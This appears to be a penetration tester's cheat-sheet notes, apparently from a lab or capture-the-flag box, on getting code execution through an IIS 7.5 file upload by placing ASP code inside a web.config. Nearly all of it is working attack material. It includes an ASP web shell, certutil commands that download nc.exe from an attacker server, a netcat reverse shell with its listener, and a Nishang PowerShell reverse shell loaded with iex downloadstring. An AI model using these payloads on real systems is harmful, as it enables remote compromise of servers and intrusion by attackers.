80 http Microsoft IIS httpd 7.5
IIS 7.5 = Windows 2008 R2test.txt ..fail
test.asp ..fail
test.aspx ..fail
test.jpg ..ok
web.config ..ok - we can exploitLast updated
-------------------------------
vi web.config ..evil asp code at bottom
Response.write(1+2) ..test will equal 3
-------------------------------
cat /opt/shells/web.aspx
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config
-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp-----------------------
We will use web.config exploit
First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")
Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo
-----------------------
google iis rce upload
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it
prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>